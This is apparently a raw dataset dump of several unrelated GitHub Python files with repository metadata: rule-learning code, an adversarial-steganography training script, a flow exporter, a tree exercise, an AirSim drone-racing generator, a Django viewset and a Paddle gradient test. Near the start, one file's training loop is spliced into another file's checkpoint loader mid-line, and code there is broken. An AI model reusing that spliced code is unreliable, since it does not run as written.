Variable(torch.zeros(num_predicates, num_feat)+.9, requires_grad=True)\nembeddings = Variable(torch.eye(num_predicates), requires_grad=True)\n\nrules = Variable(torch.rand(num_rules, num_feat*3), requires_grad=True)\n#rules = Variable(torch.zeros(num_rules, num_feat*3)+.1, requires_grad=True)\n#rule1 = torch.Tensor([0,0,0,1,1,0,0,0,0,0,1,0]).view(1,-1)\n#rule2 = torch.Tensor([0,0,0,1,0,0,1,0,0,1,0,0]).view(1,-1)\n#rule3 = torch.Tensor([0,0,1,0,0,0,0,1,0,1,0,0]).view(1,-1)\n#rules = Variable(torch.cat((rule1,rule2,rule3),0), requires_grad=True)\noptimizer = torch.optim.Adam([\n\n {'params': [embeddings]},\n {'params': [rules], 'lr': learning_rate_rules1}\n #{'params': [rules[0,:]], 'lr': learning_rate_rules1},\n #{'params': [rules[1,:]], 'lr': learning_rate_rules2}, \n #{'params': [rules[2,:]], 'lr': learning_rate_rules3}\n ],lr=learning_rate)\ncriterion = torch.nn.BCELoss(size_average=False)\n\n##-------TRAINING------\nfor epoch in range(num_iters):\n if epoch%hyper_epoch == 0:\n hyper_epsilon = hyper_epsilon/2.\n if epoch%hyper_epoch_r == 0:\n hyper_epsilon_r = hyper_epsilon_r*.7\n\n epsilon = torch.randn(rules.size())\n noisy_rules = rules + hyper_epsilon_r*epsilon\n\n epsilon_emb = torch.randn(embeddings.size())\n noisy_embeddings = embeddings + hyper_epsilon*epsilon_emb\n\n for par in optimizer.param_groups[:]:\n for param in par['params']:\n param.data.clamp_(min=0.0,max=1.0)\n\n optimizer.zero_grad()\n valuation = valuation_init\n\n for step in range(steps):\n valuation = decoder_efficient(valuation,step)\n #print('step',step,'valuation3', valuation[3], 'valuation2',valuation[2])\n\n loss = criterion(valuation[-1],target)\n print(epoch,'lossssssssssssssssssssssssssss',loss.data[0])\n\n if epoch loading checkpoint '{}'\".format(filepath))\n checkpoint = torch.load(filepath)\n\n start_epoch = checkpoint['epoch']\n if net_local is None:\n net.load_state_dict(checkpoint['state_dict'])\n else:\n net_local.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n #scheduler.load_state_dict(checkpoint['scheduler'])\n print(\"=> loaded checkpoint (epoch {})\"\n .format(checkpoint['epoch']))\n else:\n print(\"=> no checkpoint found at '{}'\".format(filepath))\n\ndef getAdvZ(img_size,labels,batch_size,minibs):\n\n c=10\n k=5\n st = 100\n z0 = torch.rand((minibs,3,img_size,img_size)) \n cwatt = juncw.CW(target_model,c=c,kappa=k,steps=st,targeted=True,target_labels=labels) \n \n succ = False\n adv = cwatt(z0,labels)\n del cwatt\n outputs = target_model(adv)\n _,pre = torch.max(outputs,1)\n\n succ = len(torch.where(pre==labels)[0])\n\n return adv,succ\n\n\n\n\n\ndef plotval(epoch,vallabel,outputname,*args):\n assert len(vallabel)==len(args)\n i = 0\n for data in args:\n plt.clf()\n plt.plot(data)\n plt.xlabel(epoch)\n plt.ylabel(vallabel[i])\n plt.savefig('{}/{}.jpg'.format(outputname,vallabel[i])) \n i += 1\n\ndef plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch):\n plt.clf()\n plt.plot(train_losses)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/lossCurve.png'.format(outputname)) \n\n plt.clf()\n plt.plot(train_loss_secret_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/secrectlossCurve.png'.format(outputname)) \n\n plt.clf()\n plt.plot(attloss_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/attlossCurve.png'.format(outputname)) \n\n plt.clf()\n plt.plot(loss_cover_history)\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Batch')\n plt.savefig('{}/coverlossCurve.png'.format(outputname)) \n\n\ndef save_checkpoint(state, filename):\n checkpointname = filename+'_checkpoint.pth.tar'\n torch.save(state, checkpointname)\n\ndef train_model(train_loader, beta, learning_rate):\n \n\n # Iterate over batches performing forward and backward passes\n train_loss_secret_history = []\n attloss_history = []\n loss_cover_history = [] \n \n outputname = 'svhn_train'\n \n print(outputname)\n if not os.path.exists(outputname):\n os.mkdir(outputname)\n best_val_psnr_secret = -1\n best_val_psnr_sc = 10000\n vallabel =['MSE','PSNR','SSIM','APE','LIPIPS','PSNR_c','SSIM_c','LIPIPS_c','MSE_c']\n l2loss_secret_history = []\n # Iterate over batches performing forward and backward passes\n psnr_secret_history = []\n ssim_secret_history = []\n mean_pixel_error_history = [] \n lpips_error_history = []\n psnr_sc_history =[]\n ssim_sc_history =[]\n lpips_sc_history=[]\n mse_sc_history =[]\n for epoch in range(num_epochs):\n\n # Train mode\n\n train_losses = []\n # Train one epoch\n cover_succ = 0\n for idx, train_batch in enumerate(train_loader):\n \n net.train()\n train_secrets, labels = train_batch\n train_secrets = train_secrets.to(device)\n \n labels = labels.to(device)\n train_covers,succ = getAdvZ(imgsize,labels,batch_size,len(train_secrets))\n cover_succ+= int(succ)\n print(\"epo:{} att z succ rate:{}\".format(epoch,cover_succ/((idx+1)*batch_size)))\n\n train_secrets = Variable(train_secrets, requires_grad=False)\n train_covers = Variable(train_covers, requires_grad=False)\n\n \n # Forward + Backward + Optimize\n \n optimizer.zero_grad()\n mix_img,recover_secret = net(train_secrets,train_covers) # to be [-1,1]\n \n train_loss, train_loss_secret,attloss,loss_cover = attack1_loss(recover_secret,mix_img, train_secrets,train_covers,beta,labels)\n #show\n\n if (idx+1)%print_freq == 0 or idx==1:\n toshow = torch.cat((train_secrets[:4]*_std_torch+_mean_torch,train_covers[:4],mix_img[:4],recover_secret[:4]),dim=0)\n imgg = make_grid(toshow,nrow=nrow_)\n save_image(imgg,'{}/{}_{}.png'.format(outputname,epoch,idx),normalize=False)\n \n plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch)\n \n\n train_loss.backward()\n optimizer.step()\n \n # Saves training loss\n train_losses.append(float(train_loss.data))\n train_loss_secret_history.append(float(train_loss_secret.data))\n attloss_history.append(float(attloss.data))\n loss_cover_history.append(float(loss_cover.data))\n # Prints mini-batch losses\n print('Training: Batch {0}/{1}. Loss of {2:.4f},secret loss of {3:.4f}, attack1_loss of {4:.4f}, loss_cover {5:.5f}'.format(idx+1, len(train_loader), train_loss.data, train_loss_secret.data,attloss.data,loss_cover))\n \n \n \n\n if (epoch==0 or (epoch+1)%20==0):\n modelsavepath ='output/svhn/Epoch_{}_{}_latest'.format(epoch,outputname)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': net.state_dict(),\n 'optimizer' : optimizer.state_dict()},modelsavepath)\n \n mean_train_loss = np.mean(train_losses)\n \n # Prints epoch average loss\n print ('Epoch [{0}/{1}], Average_loss: {2:.4f}'.format(\n epoch+1, num_epochs, mean_train_loss))\n plotloss(train_losses,train_loss_secret_history,attloss_history,loss_cover_history,outputname,epoch) \n \n \n return net,mean_train_loss\n\n\ndef convert1(img):\n img = img * 255.0\n img = img.permute(0, 2, 3, 1).cpu().detach().numpy()\n return img\n\n\ndef test():\n \n \n MODELS_PATH = '../Weights/Svhn.pth.tar'\n net.eval()\n load_checkpoint(MODELS_PATH)\n \n total = 0\n acctotal = 0\n l2loss_secrets = 0 \n l2loss_covers = 0 \n psnr_secrets =0 \n ssim_secrets =0 \n cover_succ=0\n mean_pixel_errors =0 \n total_all = 0\n lpips_errors,lpips_scs,mse_scs,psnr_scs,ssim_scs = 0.,0.,0.,0.,0.\n \n outputname=\"svhn_test\" \n if not os.path.exists(outputname):\n os.mkdir(outputname)\n \n for idx, train_batch in enumerate(test_loader):\n\n train_secrets, labels = train_batch\n train_secrets = train_secrets.to(device)\n total_all += train_secrets.shape[0]\n if total_all<=1000:\n continue\n if total_all>1500:\n break\n total += train_secrets.shape[0]\n\n labels = labels.to(device)\n\n \n train_covers,succ = getAdvZ(imgsize,labels,batch_size,len(train_secrets))\n \n # Creates variable from secret and cover images\n train_secrets = Variable(train_secrets, requires_grad=False)\n train_covers = Variable(train_covers, requires_grad=False)\n\n\n \n mix_img,recover_secret = net(train_secrets,train_covers,train=False) # to be [-1,1]\n\n acc_num, l2loss_secret,l2loss_cover,psnr_secret,ssim_secret,mean_pixel_error,lpips_error,lpips_sc,mse_sc,psnr_sc,ssim_sc= \\\n valmetric(recover_secret,mix_img, train_secrets,train_covers,beta,labels)\n acctotal += int(acc_num)\n l2loss_secrets += float(l2loss_secret)\n l2loss_covers += float(l2loss_cover)\n psnr_secrets += float(psnr_secret)\n ssim_secrets += float(ssim_secret)\n mean_pixel_errors += float(mean_pixel_error)\n lpips_errors += float(lpips_error)\n lpips_scs += float(lpips_sc)\n mse_scs += float(mse_sc)\n psnr_scs += float(psnr_sc)\n ssim_scs += float(ssim_sc)\n\n print(\"attack success rate:{}/{}={:.6f}\".format(acctotal,total,acctotal/total))\n print(\"avg. l2loss_secrets:{:.6f}\".format(l2loss_secrets/total))\n print(\"avg. l2loss_covers:{:.6f}\".format(l2loss_covers/total))\n print(\"avg. psnr_secrets:{:.6f}\".format(psnr_secrets/total))\n print(\"avg. ssim_secrets:{:.6f}\".format(ssim_secrets/total))\n print(\"avg. mean_pixel_errors:{:.6f}\".format(mean_pixel_errors/total))\n print(\"avg. lpips_errors:{:.6f}\".format(lpips_errors/total))\n print(\"avg. lpips_scs:{:.6f}\".format(lpips_scs/total))\n print(\"avg. mse_scs:{:.6f}\".format(mse_scs/total))\n print(\"avg. psnr_scs:{:.6f}\".format(psnr_scs/total))\n print(\"avg. ssim_scs:{:.6f}\".format(ssim_scs/total))\n \n diff = mix_img-train_covers\n diff = (diff-torch.min(diff))/(torch.max(diff)-torch.min(diff))\n toshow = torch.cat((train_secrets[:4]*_std_torch+_mean_torch,train_covers[:4],mix_img[:4],recover_secret[:4],diff[:4]),dim=0)\n imgg = make_grid(toshow,nrow=nrow_)\n save_image(imgg,'{}/{}.png'.format(outputname,idx),normalize=False)\n\n print(\"finished.\")\n\n\n\nif __name__ == \"__main__\":\n\n stage = \"test\" # or train\n\n cwd = os.getcwd()\n # Hyper Parameters\n num_epochs = 200\n #batch_size = 512\n batch_size =64\n batch_size_test = 10\n print_freq = 50\n val_freq = 50\n nrow_ = 4\n learning_rate = 0.0001\n beta = 10\n print(\"beta : {}\".format(beta))\n imgsize=32\n\n \n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n target_model, ds_fetcher, is_imagenet = selector.select('svhn') #labels:0:数字1,...,9:数字10\n target_model.eval().to(device)\n kappa = 5\n\n modellp = PerceptualSimilarity.models.PerceptualLoss(model='net-lin', net='alex', use_gpu=True, gpu_ids=[0])\n\n residual_en = True\n residual_de = True\n lambda_net = 0.8\n print(\"encoder residual learning:{}; decoder:{}, lambda_net:{}\".format(residual_en,residual_de,lambda_net))\n\n net = Net(residual_en,residual_de,lambda_net)\n net = torch.nn.DataParallel(net).cuda()\n optimizer = optim.Adam(net.parameters(), lr=learning_rate)\n \n\n train_loader = ds_fetcher(batch_size=batch_size,train=True,val=False)\n # # Creates test set\n test_loader = ds_fetcher(batch_size=batch_size_test,train=False,val=True) # 因为train的时候batch_size=32,所以用的前1024个做的val,用后面的做test就行\n \n _mean_torch = torch.tensor((0.5, 0.5, 0.5)).view(3,1,1).to(device)\n _std_torch = torch.tensor((0.5, 0.5, 0.5)).view(3,1,1).to(device)\n\n if stage == \"test\":\n test()\n elif stage == \"train\":\n net, mean_train_loss = train_model(train_loader, beta, learning_rate)\n","repo_name":"csjunjun/RIC","sub_path":"SVHN.py","file_name":"SVHN.py","file_ext":"py","file_size_in_byte":14372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"70341122639","text":"#!/usr/bin/env python\n\n__author__ = 'jsommers@colgate.edu'\n\nfrom flowexporter import FlowExporter\n\nclass TextExporter(FlowExporter):\n '''Export flowlets to a simple text format'''\n def __init__(self, rname, bufsize=500):\n FlowExporter.__init__(self, rname)\n outname = self.routername + '_flow.txt'\n self.outfile = open(outname, 'wb')\n self.buffer = []\n self.bufsize = bufsize\n\n def _flush_buffer(self):\n self.outfile.write(''.join(self.buffer))\n self.buffer = []\n\n def shutdown(self):\n self._flush_buffer()\n self.outfile.close()\n\n def exportflow(self, ts, flet):\n record = 'textexport %s %0.06f %s\\n' % (self.routername, ts, str(flet))\n self.buffer.append(record)\n if len(self.buffer) >= self.bufsize:\n self._flush_buffer()\n \n","repo_name":"jsommers/fs","sub_path":"flowexport/textexport.py","file_name":"textexport.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"29"} +{"seq_id":"75175019277","text":"from CH4_Trees_and_Graphs.TreeNode import TreeNode\n# Also this is question no 108 at LeetCode\n\nsorted_list = [0,1,2,3,4,5,6,7,8,9,10]\n\n\ndef in_order(head):\n if not head:\n return\n in_order(head.left)\n print(head.val)\n in_order(head.right)\n\ndef construct_tree(start, end):\n mid_index = int((start + end) / 2)\n head = TreeNode(sorted_list[mid_index])\n if mid_index != start:\n head.left = construct_tree(start, mid_index-1)\n if mid_index != end:\n head.right = construct_tree(mid_index+1, end)\n\n return head\n\nstart = 0\nend = len(sorted_list) - 1\n\nin_order(construct_tree(start, end))","repo_name":"CoderKn1ght/Algorithm-Implementations","sub_path":"CH4_Trees_and_Graphs/q2_sorted_list_into_binary_tree_with_minimum_height.py","file_name":"q2_sorted_list_into_binary_tree_with_minimum_height.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38986929214","text":"from __future__ import division\nimport random\nimport math\nimport time\nimport numpy as np\nimport threading\nimport os, sys\nimport airsimdroneracingvae\nimport airsimdroneracingvae.types\nimport airsimdroneracingvae.utils\nfrom pynput.keyboard import Key, Controller\n\nkeyboard = Controller()\nkey = \"r\"\n\n# import utils\ncurr_dir = os.path.dirname(os.path.abspath(__file__))\nimport_path = os.path.join(curr_dir, '..', '..')\nsys.path.insert(0, import_path)\nimport racing_utils\nimport Extractor\n\nrandom.seed()\n\n# DEFINE DATA GENERATION META PARAMETERS\ngate_passed_threshold = 0.8\nviz_traj = False\nvel_max = 8.0\nacc_max = 30.0\nspeed_through_gate = 2.8\nnum_of_labs = 5\nrecord = True\n\n\nclass DroneRacingDataGenerator(object):\n def __init__(self,\n drone_name,\n odom_loop_rate_sec,\n vel_max,\n acc_max):\n self.odom_loop_rate_sec = odom_loop_rate_sec\n self.base_track = None\n self.track_gate_poses = None\n self.num_training_laps = None\n self.next_gate_idx = 0\n self.last_gate_passed = -1\n self.Dists = None\n self.velocities = []\n # should be same as settings.json\n self.gate_names = []\n self.drone_name = drone_name\n self.track_name = 'tracks/interpolated_8.csv'\n self.last_future = []\n self.start_end = 0.0\n self.passed = True\n self.tic = 0\n self.record_flag = 0\n self.timer_flag = 0\n self.lab = 0\n # training params\n self.vel_max = vel_max\n self.acc_max = acc_max\n self.traj_tracker_gains = airsimdroneracingvae.TrajectoryTrackerGains(kp_cross_track=5.0, kd_cross_track=0.0,\n kp_vel_cross_track=3.0,\n kd_vel_cross_track=0.0,\n kp_along_track=0.4, kd_along_track=0.0,\n kp_vel_along_track=0.04,\n kd_vel_along_track=0.0,\n kp_z_track=2.0, kd_z_track=0.0,\n kp_vel_z=0.4, kd_vel_z=0.0,\n kp_yaw=3.0, kd_yaw=0.1)\n # todo encapsulate in function\n self.client = airsimdroneracingvae.MultirotorClient()\n self.client.confirmConnection()\n time.sleep(0.05)\n\n # threading stuff\n self.got_odom = False\n self.is_velocity_thread_active = True\n self.is_expert_planner_controller_thread_active = True\n\n def initialize_quadrotor(self):\n self.client.enableApiControl(True, vehicle_name=self.drone_name)\n time.sleep(0.01)\n self.client.armDisarm(True, vehicle_name=self.drone_name)\n time.sleep(0.01)\n self.client.setTrajectoryTrackerGains(self.traj_tracker_gains.to_list(),\n vehicle_name=self.drone_name)\n time.sleep(0.01)\n\n self.takeoff_with_moveOnSpline(x=57, y=6, z=-14, vel_max=self.vel_max, acc_max=5)\n time.sleep(2)\n\n def start_training_data_generator(self, level_name='Soccer_Field_Easy'):\n # Environment Initialization\n self.load_level(level_name)\n open_track = Extractor.ReadGates(self.track_name)\n closing = Extractor.ReadGates('tracks/Closing_8.csv')\n self.base_track = open_track + closing\n self.track_gate_poses = Extractor.DistortCheckeredGates(self.base_track, -0.8, 0.8)\n self.gate_names = self.name_the_gates(len(self.track_gate_poses))\n self.Dists, self.start_end = Extractor.Get_Distances_between_Gates(self.track_gate_poses)\n # print(self.Dists)\n self.create_track('CheckeredDroneGate16x16', self.track_gate_poses, 1)\n # Drone Initialization\n self.initialize_quadrotor()\n\n # Generation\n\n if record and self.record_flag == 0:\n keyboard.press(key)\n keyboard.release(key)\n self.record_flag = 1\n\n while self.lab <= num_of_labs:\n self.expert_planner_controller_callback()\n\n if record and self.lab > num_of_labs:\n keyboard.press(key)\n keyboard.release(key)\n\n def repeat_timer_expert(self, task, period):\n while self.is_expert_planner_controller_thread_active:\n task()\n time.sleep(period)\n\n def repeat_timer_vel(self, task, period):\n while self.is_velocity_thread_active:\n task()\n time.sleep(period)\n\n def load_level(self, level_name):\n ''' Loads an empty Environment '''\n self.client.simLoadLevel(level_name)\n time.sleep(2)\n racing_utils.AllGatesDestroyer(self.client)\n\n def create_track(self, gate_type, gate_poses, scale):\n ''' Creates a track '''\n for i, poses in enumerate(gate_poses):\n self.client.simSpawnObject(self.gate_names[i], gate_type,\n poses, scale)\n time.sleep(0.05)\n\n def name_the_gates(self, num_gates_track):\n names = []\n for i in range(num_gates_track):\n name = 'Gate_' + str(i)\n names.append(name)\n return names\n\n def takeoff_with_moveOnSpline(self, x, y, z, vel_max, acc_max):\n self.client.moveOnSplineAsync(path=[airsimdroneracingvae.Vector3r(x, y, z)],\n vel_max=vel_max, acc_max=acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name).join()\n\n def expert_planner_controller_callback(self):\n\n if self.next_gate_idx == 1 and self.timer_flag == 0:\n self.tic = time.perf_counter()\n self.timer_flag = 1\n self.lab += 1\n\n if self.next_gate_idx == len(self.track_gate_poses):\n toc = time.perf_counter()\n print('Finished lab ' + str(self.lab))\n print('lab Time:', toc - self.tic)\n print('lab max velocity = ', np.max(self.velocities))\n print('lab average velocity = ', np.mean(self.velocities))\n self.last_gate_passed = -1\n self.next_gate_idx = 0\n self.timer_flag = 0\n time.sleep(2)\n self.track_gate_poses = Extractor.DistortCheckeredGates(self.base_track, -0.8, 0.8)\n for gate_idx in range(len(self.track_gate_poses)):\n self.client.simSetObjectPose(self.gate_names[gate_idx], self.track_gate_poses[gate_idx])\n\n if self.passed:\n self.fly_to_next_gate_with_moveOnSpline(self.next_gate_idx)\n\n self.passed = self.simGetLastGatePassed()\n\n def fly_to_next_gate_with_moveOnSpline(self, next_gate_idx):\n gates_to_limit1 = [len(self.track_gate_poses) - 1, len(self.track_gate_poses) - 2,\n len(self.track_gate_poses) - 3, 0]\n gates_to_limit2 = [46, 47, 48]\n if self.next_gate_idx in gates_to_limit1 and self.lab > 0:\n v_max = 6\n elif self.next_gate_idx < 50 and self.next_gate_idx > 45:\n v_max = 5\n elif self.next_gate_idx < 39 and self.next_gate_idx > 10:\n v_max = 5.5\n else:\n v_max = self.vel_max\n\n self.last_future.append(\n self.client.moveOnSplineVelConstraintsAsync([self.track_gate_poses[next_gate_idx].position],\n [self.get_gate_facing_vector_from_quaternion(\n self.track_gate_poses[next_gate_idx].orientation,\n scale=speed_through_gate)],\n vel_max=v_max, acc_max=self.acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name))\n\n velocity_com = self.client.simGetGroundTruthKinematics(self.drone_name).linear_velocity\n self.velocities.append(math.sqrt(velocity_com.x_val ** 2 + velocity_com.y_val ** 2 + velocity_com.z_val ** 2))\n\n def fly_to_next_gate_with_moveOnSpline_No_Deacc(self, next_gate_idx):\n self.last_future.append(\n self.client.moveOnSplineAsync([self.track_gate_poses[next_gate_idx].position],\n vel_max=self.vel_max, acc_max=self.acc_max,\n add_curr_odom_position_constraint=True,\n add_curr_odom_velocity_constraint=True,\n viz_traj=viz_traj,\n vehicle_name=self.drone_name))\n\n def velocity_calculator_callback(self):\n velocity_com = self.client.simGetGroundTruthKinematics(self.drone_name).linear_velocity\n self.velocities.append(math.sqrt(velocity_com.x_val ** 2 + velocity_com.y_val ** 2 + velocity_com.z_val ** 2))\n print(self.velocities)\n\n def synchronize(self, next_gate_idx):\n if next_gate_idx == 0:\n time.sleep(2.2)\n print('yes')\n if self.track_name == 'Qualifier_Tier_3.csv':\n if next_gate_idx == 12 or next_gate_idx == 11:\n time.sleep(0.22 * self.Dists[next_gate_idx - 1])\n elif next_gate_idx == 8:\n time.sleep(0.45 * self.Dists[next_gate_idx - 1])\n else:\n time.sleep(0.26 * self.Dists[next_gate_idx - 1])\n else:\n sleep_time = (10 ** (self.Dists[next_gate_idx - 1] / 2.5 + 1)) * math.exp(-self.Dists[next_gate_idx - 1])\n print(sleep_time)\n time.sleep(sleep_time)\n\n def simGetLastGatePassed(self):\n drone_position = self.client.simGetGroundTruthKinematics().position\n dist_from_curr_gate = math.sqrt(\n (drone_position.x_val - self.track_gate_poses[self.next_gate_idx].position.x_val) ** 2\n + (drone_position.y_val - self.track_gate_poses[self.next_gate_idx].position.y_val) ** 2\n + (drone_position.z_val - self.track_gate_poses[self.next_gate_idx].position.z_val) ** 2)\n\n if dist_from_curr_gate < gate_passed_threshold:\n self.last_gate_passed += 1\n self.next_gate_idx += 1\n return True\n\n # def Finish(self):\n\n # maybe maintain a list of futures, or else unreal binary will crash if join() is not called at the end of script\n\n def join_all_pending_futures(self):\n for i in range(len(self.track_gate_poses)):\n self.last_future[i].join()\n\n def start_expert_planner_controller_thread(self):\n if not self.is_expert_planner_controller_thread_active:\n self.is_expert_planner_controller_thread_active = True\n self.expert_planner_controller_thread.start()\n print(\"Started expert_planner_controller thread\")\n\n def stop_expert_planner_controller_thread(self):\n if self.is_expert_planner_controller_thread_active:\n self.is_expert_planner_controller_thread_active = False\n # self.expert_planner_controller_thread.join()\n print(\"Stopped expert_planner_controller thread\")\n\n def set_num_training_laps(self, num_training_laps):\n self.num_training_laps = num_training_laps\n\n def get_gate_facing_vector_from_quaternion(self, airsim_quat, scale=1):\n # convert gate quaternion to rotation matrix.\n # ref: https://en.wikipedia.org/wiki/Rotation_matrix#Quaternion; https://www.lfd.uci.edu/~gohlke/code/transformations.py.html\n q = np.array([airsim_quat.w_val, airsim_quat.x_val, airsim_quat.y_val, airsim_quat.z_val], dtype=np.float64)\n n = np.dot(q, q)\n if n < np.finfo(float).eps:\n return airsimdroneracingvae.Vector3r(0.0, 1.0, 0.0)\n q *= np.sqrt(2.0 / n)\n q = np.outer(q, q)\n rotation_matrix = np.array([[1.0 - q[2, 2] - q[3, 3], q[1, 2] - q[3, 0], q[1, 3] + q[2, 0]],\n [q[1, 2] + q[3, 0], 1.0 - q[1, 1] - q[3, 3], q[2, 3] - q[1, 0]],\n [q[1, 3] - q[2, 0], q[2, 3] + q[1, 0], 1.0 - q[1, 1] - q[2, 2]]])\n gate_facing_vector = rotation_matrix[:, 1]\n return airsimdroneracingvae.Vector3r(scale * gate_facing_vector[0], scale * gate_facing_vector[1],\n scale * gate_facing_vector[2])\n\n\nif __name__ == \"__main__\":\n drone_racing_datagenerator = DroneRacingDataGenerator(drone_name='drone_0',\n odom_loop_rate_sec=0.005,\n vel_max=vel_max,\n acc_max=acc_max\n )\n drone_racing_datagenerator.start_training_data_generator()\n","repo_name":"Mohamed-Omran/Autonomous-Drone-Racing-with-Airsim","sub_path":"datagen/action_generator/Race_Expert.py","file_name":"Race_Expert.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"30900988364","text":"from rest_framework import viewsets\nfrom .models import DigitalBookPDF\nfrom .serializers import DigitalBookPDFSerializer\nfrom rest_framework.decorators import action\nfrom users.models import User\nfrom users.serializers import UserSerializer\nfrom digital_books.models import Digital_Book\nfrom rest_framework.response import Response\nfrom adquisitions.models import Collection\nfrom adquisitions.serializers import CollectionSerializer\n\nfrom permissions.services import APIPermissionClassFactory\n\ndef is_admin(user, request):\n return user.is_admin == True\n\ndef is_logged(user, obj, request):\n return user.email == obj.email\n\nclass DigitalBookPDFViewSet(viewsets.ModelViewSet):\n queryset = DigitalBookPDF.objects.all()\n serializer_class = DigitalBookPDFSerializer\n\n permission_classes = (\n APIPermissionClassFactory(\n name='UserPermission',\n permission_configuration={\n 'base': {\n 'create': is_admin,\n 'list': True,\n },\n 'instance': {\n 'retrieve': is_logged,\n 'destroy': False,\n 'update': False,\n 'get_pdf': is_logged,\n }\n }\n ),\n )\n\n @action(detail=False, url_path='get-pdf', methods=['get'])\n def get_pdf(self, request):\n user_id = request.query_params['user']\n user = User.objects.get(pk=user_id)\n collection = Collection.objects.filter(user=user)\n pdf = []\n for book in collection:\n try:\n digitalBookPdf = DigitalBookPDF.objects.get(book=book.book)\n pdf.append(DigitalBookPDFSerializer(digitalBookPdf).data)\n \n except DigitalBookPDF.DoesNotExist:\n pass\n \n return Response(pdf)\n #api/v1/digital-books-pdf/get-pdf/?user=#\n\n","repo_name":"amado-developer/ReadHub-RestfulAPI","sub_path":"digitalBooksPDF/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"36030654181","text":"import unittest\n\nimport numpy as np\nimport parameterized as param\n\nimport paddle\nfrom paddle.base import core, framework\n\nnp.random.seed(2023)\n\n\ndef apply_to_static(net, use_cinn):\n build_strategy = paddle.static.BuildStrategy()\n build_strategy.build_cinn_pass = use_cinn\n return paddle.jit.to_static(net, build_strategy=build_strategy)\n\n\nclass PrimeNet(paddle.nn.Layer):\n def __init__(self):\n super().__init__()\n self.fc = paddle.nn.Linear(4, 4)\n\n def forward(self, x, index, axis):\n tmp = self.fc(x)\n out = paddle.gather(tmp, index, axis)\n return out\n\n\n@param.parameterized_class(\n ('primal0', 'index', 'axis', 'x_dtype', 'index_dtype', 'v', \"count\"),\n [\n (\n np.random.rand(100),\n np.array([1, 3, 5]),\n 0,\n np.float32,\n np.int32,\n np.random.rand(3),\n 0,\n ),\n (\n np.random.rand(10, 20),\n np.array([1, 3, 5]),\n 0,\n np.float64,\n np.int64,\n np.random.rand(3, 20),\n 1,\n ),\n (\n np.random.rand(10, 20),\n np.array([1, 1, 3]),\n 0,\n np.float32,\n np.int32,\n np.random.rand(3, 20),\n 2,\n ),\n (\n # Something wrong with gather grad cpu kernel\n np.random.rand(3, 88, 30),\n np.array([1, 3, 5]),\n 1,\n np.float32,\n np.int32,\n np.random.rand(3, 3, 30),\n 3,\n ),\n (\n np.random.rand(10, 88, 10),\n np.array([1, 3, 5]),\n 0,\n np.float16,\n np.int32,\n np.random.rand(3, 88, 10),\n 4,\n ),\n ],\n)\nclass TestGatherGradComp(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.primal0 = cls.primal0.astype(cls.x_dtype)\n cls.index = cls.index.astype(cls.index_dtype)\n cls.v = cls.v.astype(cls.x_dtype)\n\n def train(self, use_prim, use_cinn):\n paddle.seed(2022)\n self.x = paddle.randn([2, 4])\n self.index = paddle.to_tensor(np.array([0, 1]))\n self.x.stop_gradient = False\n net = PrimeNet()\n core._set_prim_backward_enabled(use_prim)\n net = apply_to_static(net, use_cinn)\n out = net(self.x, self.index, 0)\n res = paddle.autograd.grad(out, [self.x])\n\n return res\n\n def test_cinn(self):\n paddle.disable_static()\n use_cinn = True\n if isinstance(\n framework._current_expected_place(), framework.core.CPUPlace\n ):\n # TODO(jiabin): CINN will crashed in this case open it when fixed\n use_cinn = False\n dy_res = self.train(use_prim=False, use_cinn=False)\n\n comp_st_cinn_res = self.train(use_prim=True, use_cinn=use_cinn)\n\n for i in range(len(dy_res)):\n np.testing.assert_allclose(\n comp_st_cinn_res[i].numpy(),\n dy_res[i].numpy(),\n rtol=1e-6,\n atol=1e-6,\n )\n paddle.enable_static()\n\n def test_tanh_grad_comp(self):\n paddle.enable_static()\n\n def actual(primal0, index, axis, v):\n core._set_prim_backward_enabled(True)\n mp, sp = paddle.static.Program(), paddle.static.Program()\n with paddle.static.program_guard(mp, sp):\n x = paddle.static.data('primal0', primal0.shape, primal0.dtype)\n index_tmp = paddle.static.data(\n 'index', index.shape, index.dtype\n )\n x.stop_gradient = False\n index_tmp.stop_gradient = True\n z = paddle.gather(x, index_tmp, axis)\n z_grad = paddle.static.data('v', z.shape, z.dtype)\n res = paddle.static.gradients([z], [x], [z_grad])\n exe = paddle.static.Executor()\n exe.run(sp)\n out = exe.run(\n program=mp,\n feed={\n 'primal0': primal0,\n 'index': index,\n 'v': v,\n },\n fetch_list=[res[0].name],\n )\n return out[0]\n\n def desired(primal0, index, axis, v):\n core._set_prim_backward_enabled(False)\n mp, sp = paddle.static.Program(), paddle.static.Program()\n with paddle.static.program_guard(mp, sp):\n x = paddle.static.data('primal0', primal0.shape, primal0.dtype)\n index_tmp = paddle.static.data(\n 'index', index.shape, index.dtype\n )\n x.stop_gradient = False\n index_tmp.stop_gradient = True\n z = paddle.gather(x, index_tmp, axis)\n z_grad = paddle.static.data('v', z.shape, z.dtype)\n res 